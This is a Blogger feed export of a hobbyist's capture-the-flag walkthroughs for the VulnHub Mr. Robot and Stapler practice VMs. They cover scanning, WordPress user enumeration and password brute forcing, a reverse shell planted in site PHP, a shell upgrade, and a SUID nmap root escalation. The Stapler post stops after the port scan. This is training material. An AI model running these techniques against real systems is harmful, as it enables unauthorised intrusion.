tag:blogger.com,1999:blog-3937002876292439842024-03-20T00:49:25.906-04:00Reaping bytes, one shell at a timeA journey to becoming a 1337H@x0r! through the thoughts and actions of a n00bByteReaperhttp://www.blogger.com/profile/05483546627343627430noreply@blogger.comBlogger4125tag:blogger.com,1999:blog-393700287629243984.post-47154496916628572282016-07-05T11:21:00.002-04:002016-07-05T11:21:56.277-04:00fsociety - Mr. R0b0t<a href="https://www.vulnhub.com/entry/mr-robot-1,151/" target="_blank">Mr. Robot</a> vulnerable VM by jason<br />
<br />
"Based on the show, Mr. Robot. <br />
This VM has three keys hidden in different locations. Your goal is to
find all three. Each key is progressively difficult to find. <br />
The VM isn't too difficult. There isn't any advanced exploitation or
reverse engineering. The level is considered beginner-intermediate."<br />
<br />
Lets Reap Some Bytes<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><img alt="" border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtQRoh0o7AjJUlmBRbwLOHW2z2brapO6GztBdFpLuiEmljyhE8d3x68DCVK6mAqqadkJFD1W8ZFxxCqpLUeclPFHkbOZVK5F97APGmT1TtdrfGaP7vt68mnTUlj-f2RTk_5W2BkeMhyphenhyphenSo/s640/netdiscover.png" style="margin-left: auto; margin-right: auto;" title="test" width="640" /></td></tr>
<tr align="left"><td class="tr-caption" style="text-align: center;">Command: netdiscover -r 10.10.10.0/24</td><td class="tr-caption"></td><td class="tr-caption"></td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlXrlVJMrgiL1INbwwuVswCaypIFLhftFVo5kNa0S9Xhjcia1LbsNWboHQ3d02WWa3ekSQVvDcwCOdTXrgYRYxd7kuTGtpcLPaeRs6IwvcQdVf0t7ZNQCA39DYE-b9ZegGLu1_tizNeU/s1600/nmap.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlXrlVJMrgiL1INbwwuVswCaypIFLhftFVo5kNa0S9Xhjcia1LbsNWboHQ3d02WWa3ekSQVvDcwCOdTXrgYRYxd7kuTGtpcLPaeRs6IwvcQdVf0t7ZNQCA39DYE-b9ZegGLu1_tizNeU/s640/nmap.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: nmap -sS -Pn -p1-65535 10.10.10.4</td><td class="tr-caption" style="text-align: left;"></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"></td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: left;">
Sweet. Nothing but http/https running. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_vkIzW1kUKg7REqyaOj3bs2AxU1SOcsKseZn9T85lWZj9_mDebquq0yRzFZdOR2wFGqesTCMMxo11rR3BrQpca07yr1ZlXSkQPg-FWUg_BX4X8UHI-2U5l5meS2GxQriv913oAXwSb48/s1600/nikto_port_80.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_vkIzW1kUKg7REqyaOj3bs2AxU1SOcsKseZn9T85lWZj9_mDebquq0yRzFZdOR2wFGqesTCMMxo11rR3BrQpca07yr1ZlXSkQPg-FWUg_BX4X8UHI-2U5l5meS2GxQriv913oAXwSb48/s640/nikto_port_80.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: nikto -host 10.10.10.4</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
Nice, word-press. </div>
<div class="separator" style="clear: both; text-align: left;">
This should definitely help us get a rev shell.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZahQaoc_IggEv1JCkJXvKhOlwdH4a0Bxk2Yf0byZoIpQaWeIgae3AgXOBT34lvQ5BIBk_ikyRBhiWgINTrabRZPrNrIz450NYd93o6itPwrr71K8PJcIDnNW1QhHeEwN8FjiowarIc1A/s640/wpscan_robots.png" style="margin-left: auto; margin-right: auto;" width="640" /></td></tr>
<tr align="center"><td class="tr-caption">Command: wpscan --url http://10.10.10.4</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
WPScan has revealed much of the same normal stuff. Although nikto did not tell us that a robots.txt was present so i will WGet the robots.txt file and see if there are any other clues to be found.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpr-I5MT9grlB_FqgcEssqgjj2q0_sOe6L_QCNiBzg5YtLcDuN5QHnnyIdpwu0VdMqhDL5Bxjw7q0q2bVR_Qsa43w9KBq6GdKM9nsR0KObYPITd6eDB5QAj365nx3QNjwyGYsP-xNPcmg/s1600/wget_robots.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpr-I5MT9grlB_FqgcEssqgjj2q0_sOe6L_QCNiBzg5YtLcDuN5QHnnyIdpwu0VdMqhDL5Bxjw7q0q2bVR_Qsa43w9KBq6GdKM9nsR0KObYPITd6eDB5QAj365nx3QNjwyGYsP-xNPcmg/s640/wget_robots.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: wget http://10.10.10.4/robots.txt</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge65ELPIutpdGqbWCj3rE9J6vghF4_QxRuMRdbAbiMICKldlJ62vXe4juJgWlbb8qW1w61-f5Dpy4wx7nTBbvgddNaNsfPwXxj3Zt59Z7x21qhCp1VwAU6Qs80H3nqLwWCE8AUiX7hrXE/s1600/cat_robots.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge65ELPIutpdGqbWCj3rE9J6vghF4_QxRuMRdbAbiMICKldlJ62vXe4juJgWlbb8qW1w61-f5Dpy4wx7nTBbvgddNaNsfPwXxj3Zt59Z7x21qhCp1VwAU6Qs80H3nqLwWCE8AUiX7hrXE/s640/cat_robots.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: cat robots.txt</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
So robots.txt reveals our first key and a fsocity.dic file. We use wget to retrieve both.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First Key: 073403c8a58a1f80d943455fb30724b9</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
User Enumeration: </div>
<div class="separator" style="clear: both; text-align: left;">
So i decided to reinvent the wheel and create my own WordPress user enum tool. (WPScan can do this but i wanted to work in some python of my own, for learnings sake).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvkRTURq0phVsGxlDO-jvOWsMhyvbyIyuMRcds9r0Zons9EhDsD_l4564mj92wFtkI2HLrHuv9QLG7q21NmupysyPCvSJFvFmlkniPaw-ZxVpcwI_21aovj6UHdev7V9J8EX2WVQfuvA/s1600/userenum_python.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvkRTURq0phVsGxlDO-jvOWsMhyvbyIyuMRcds9r0Zons9EhDsD_l4564mj92wFtkI2HLrHuv9QLG7q21NmupysyPCvSJFvFmlkniPaw-ZxVpcwI_21aovj6UHdev7V9J8EX2WVQfuvA/s640/userenum_python.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">My Code</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">****NOTE: I opted not to use threading due to the small amount of enumberation that needs to occur. I would add multithreading if i was to use very large username lists ****</span></b></div>
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhML8m3G6rr7BiPGMF14PMMr-t6PHZ3q0QK8xH1OV4kmrlkH5T2MBcu0UZVv667gH0UJCuTMWuhKqJl7FV-YCLyPS8QTxbxR6lAmAXMu882ad1G6ZZb89jjhIUy4JVxng4iNryKid-sFXg/s1600/userenum_output.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhML8m3G6rr7BiPGMF14PMMr-t6PHZ3q0QK8xH1OV4kmrlkH5T2MBcu0UZVv667gH0UJCuTMWuhKqJl7FV-YCLyPS8QTxbxR6lAmAXMu882ad1G6ZZb89jjhIUy4JVxng4iNryKid-sFXg/s640/userenum_output.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php</td></tr>
</tbody></table>
<br />
<br />
Found User: elliot (the name list i used is from <a href="http://www.outpost9.com/files/wordlists.html" target="_blank">outpost9</a>)<br />
<br />
Using the username elliot we should be able to bruteforce a password. I decided that the fsocity.dic file would be a good dictionary to use as it was given to us by the author :)<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4riNgwXp-y-PLN-fAzCC3jIJ93tgY_1LOh-ezTd2lsKqRLP_NYESltv3FI_UzFcHmXNJZGk0hI3mj7muZqkdwq_V1uyd-wuEYcwUKZfa6QwcjCuP-wIkJ_Q450TTbgbFyyWUe2gyK12s/s1600/wpscan_password.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4riNgwXp-y-PLN-fAzCC3jIJ93tgY_1LOh-ezTd2lsKqRLP_NYESltv3FI_UzFcHmXNJZGk0hI3mj7muZqkdwq_V1uyd-wuEYcwUKZfa6QwcjCuP-wIkJ_Q450TTbgbFyyWUe2gyK12s/s640/wpscan_password.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot</td></tr>
</tbody></table>
<br />
Awesome we have a hit...after 4 hours...because the password was the 2nd to last word in the list....thanks for that...<br />
<br />
Upon logging in as elliot i was able to modify the php of the site to add a reverse shell.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAYmG5uwcZCXFu_98YqkqKGEcPBs9VZYA3hQ7trV08W4on-FCQtEvFKD4_L3RTB27umcNwCKP46cbsM-uM5db1F_hdc6vzLBemI0NpxTqau3525lGB-ZeJw-jQMFfhH2O2yR2167kLZiM/s1600/revshell_start.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAYmG5uwcZCXFu_98YqkqKGEcPBs9VZYA3hQ7trV08W4on-FCQtEvFKD4_L3RTB27umcNwCKP46cbsM-uM5db1F_hdc6vzLBemI0NpxTqau3525lGB-ZeJw-jQMFfhH2O2yR2167kLZiM/s640/revshell_start.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: nc -lvp 80</td></tr>
</tbody></table>
Sweet we have a rev shell. Now lets power it up.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI9krR-xheNMzf67MhHOO1kztoFRp7E-EGFLo_8Dzzf5OjAFRQWZq-v6S3SksB0mg-0Dph8aoMuoeDe_Jv7xx82IrqYTZVum_DJucVCfYJiHZ5-fgm3nktvqllC6cAjYDhYxzwESx_UnI/s1600/revshell_powerup.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI9krR-xheNMzf67MhHOO1kztoFRp7E-EGFLo_8Dzzf5OjAFRQWZq-v6S3SksB0mg-0Dph8aoMuoeDe_Jv7xx82IrqYTZVum_DJucVCfYJiHZ5-fgm3nktvqllC6cAjYDhYxzwESx_UnI/s640/revshell_powerup.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: python -c "import pty;pty.spawn('/bin/bash');"</td></tr>
</tbody></table>
Looking at the home folder we can see that robot is readable.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEithUbDu5OyP3W1NOfabprpqKJHiCxWBJu89HdcOd0UYPJ_BR0O8nGKZs8FbV3TU1RQ0HhCf8HTziDwXQBqF9Ll_y22hlILANhDOcL0azoUQh6pHW8HU7Lu-4RnWG7lmWmoNemNRch6K1o/s1600/revshell_LS_robotHome.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEithUbDu5OyP3W1NOfabprpqKJHiCxWBJu89HdcOd0UYPJ_BR0O8nGKZs8FbV3TU1RQ0HhCf8HTziDwXQBqF9Ll_y22hlILANhDOcL0azoUQh6pHW8HU7Lu-4RnWG7lmWmoNemNRch6K1o/s640/revshell_LS_robotHome.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: ls -lah</td></tr>
</tbody></table>
<br />
Sweet the 2nd flag (we cannot read it currently, and admittedly i forgot to go back for it).<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwsJl2ecPXFg1aHSpvcglaCwxzo2ebj7ACfSwQ5j1ZsyQewbzjn1pj3GrUNyJlS-n4Rh6-F8Ey-l_1X-cpEbMQW0KkrNjRTVTjXTDhs1wnh0EWyIj8XGZfImdue1Cg1vjYz-u_vX4fZA/s1600/revshell_cat_passwd.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwsJl2ecPXFg1aHSpvcglaCwxzo2ebj7ACfSwQ5j1ZsyQewbzjn1pj3GrUNyJlS-n4Rh6-F8Ey-l_1X-cpEbMQW0KkrNjRTVTjXTDhs1wnh0EWyIj8XGZfImdue1Cg1vjYz-u_vX4fZA/s640/revshell_cat_passwd.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: cat password.raw-md5</td></tr>
</tbody></table>
<br />
Dropping the hash into the google resulted in "abcdefghijklmnopqrstuvwxyz". lul.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIM9h27vH2h-E3_ptxJ63kOD6MSO8b7eSQ-_uoU7HkVyonHgLPODW98vSgadCBX4oEN6x_Te76XXR337oZEKnm14DV-_xTiJUUg5D23a3O8C6eqbIjfzoxF_WDdENyjiNgYXh2tlkCBsE/s1600/revshell_su_robot.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIM9h27vH2h-E3_ptxJ63kOD6MSO8b7eSQ-_uoU7HkVyonHgLPODW98vSgadCBX4oEN6x_Te76XXR337oZEKnm14DV-_xTiJUUg5D23a3O8C6eqbIjfzoxF_WDdENyjiNgYXh2tlkCBsE/s640/revshell_su_robot.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: su robot</td></tr>
</tbody></table>
<br />
(again i forgot to cat the 2-of-3-flag.txt file)...<br />
<br />
I did a good amount of looking around for sudo -l, crons, etc. i found nothing much with any of them. But what i did find was a suid bit for nmap. Awesome nmap has an interactive mode. Lets see if we can get anything with it.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsb6lhzqcSeoEI8w16XnViS1cW0cZ-9Jsa1U0-pQ5tgXeIVXj_VTiPUFAL2ZyAhInlogoiSW5lRuy5qvGSkOXOgFqNuYw_wiIJKYs7ysBqz9y7tFp5BgALyqNSe5ck4lCHBmibomuSYNo/s1600/revshell_nmap.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsb6lhzqcSeoEI8w16XnViS1cW0cZ-9Jsa1U0-pQ5tgXeIVXj_VTiPUFAL2ZyAhInlogoiSW5lRuy5qvGSkOXOgFqNuYw_wiIJKYs7ysBqz9y7tFp5BgALyqNSe5ck4lCHBmibomuSYNo/s640/revshell_nmap.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: nmap --interactive</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI39DDyW2aTk_FP9eOcv_oF9zeuftr9QQyiroyIn8Etqxhf0iKV1XNXdEwDGX8mPFAXgl46PIYasIAzDcRgBKMU9yYgMVTJbvSUFZfQelagsShuO-l1nw3QullzONkJz1Y184b74XwWmc/s1600/revshell_root.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI39DDyW2aTk_FP9eOcv_oF9zeuftr9QQyiroyIn8Etqxhf0iKV1XNXdEwDGX8mPFAXgl46PIYasIAzDcRgBKMU9yYgMVTJbvSUFZfQelagsShuO-l1nw3QullzONkJz1Y184b74XwWmc/s640/revshell_root.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Sweet. We got r00t. and our third flag.</td></tr>
</tbody></table>
<br />
w00t w00t. flag 3 ==> 04787ddef27c3dee1ee161b21670b4e4<br />
<br />
<br />
Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.<br />
<br />
Thanks again to vulnhub for hosting this awesomeness.<br />
<br />ByteReaperhttp://www.blogger.com/profile/05483546627343627430noreply@blogger.com0tag:blogger.com,1999:blog-393700287629243984.post-26955098594381735532016-06-27T14:46:00.001-04:002016-06-27T14:46:35.028-04:00Execuse me...I believe you have my stapler<h2>
<code><a href="https://www.vulnhub.com/entry/stapler-1,150/" target="_blank">Stapler</a></code></h2>
<code>He110 w0rld! Today i will be sharing a guide to completing the Stapler VM hosted on <a href="https://www.vulnhub.com/" target="_blank">VulnHub</a>. This VM was created by the one and only <a href="https://www.twitter.com/@g0tmi1k" target="_blank">@</a></code><a href="https://www.twitter.com/@g0tmi1k" target="_blank"><code>g0tmi1k. </code></a><br />
<code><br /></code>
<code>As always there will be spoilers within this guide so use as little or as much as you need.</code><br />
<code><br /></code>
<code>***With all these VMs there are always multiple ways to r00t the box***</code><br />
<code><br /></code>
<code><br /></code>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<pre><code>+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+</code></pre>
<pre><code> </code></pre>
<pre><code>Lets reap some bytes...</code></pre>
<h3>
<code></code><span style="font-size: small;"><code>Discovery</code></span></h3>
<pre><code><span style="font-size: small;"><b>Command</b></span>: netdiscover -r 192.168.153.0/24</code></pre>
<pre><code><span style="color: white;"><span style="color: white;"><span style="color: red;">***Please note your IP Range can/will differ***</span></span></span></code></pre>
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_____________________________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">IP At MAC Address Count Len MAC Vendor / Hostname</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc.</td></tr>
</tbody></table>
<br />
<h3>
<span style="font-size: small;"><span style="font-family: inherit;">Enumeration</span></span></h3>
<span style="font-size: x-small;"><b>Command: </b>nmap -sS -Pn -p1-65535 192.168.153.142</span><br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Nmap scan report for Red.Initech (192.168.153.142)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Host is up (0.00023s latency).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Not shown: 65523 filtered ports</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">PORT STATE SERVICE</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">20/tcp closed ftp-data</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">21/tcp open ftp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">22/tcp open ssh</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">53/tcp open domain</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">80/tcp open http</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">123/tcp closed ntp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">137/tcp closed netbios-ns</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">138/tcp closed netbios-dgm</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">139/tcp open netbios-ssn</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">666/tcp open doom</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">3306/tcp open mysql</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">12380/tcp open unknown</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MAC Address: 00:0C:29:8B:3C:14 (VMware)</td></tr>
</tbody></table>
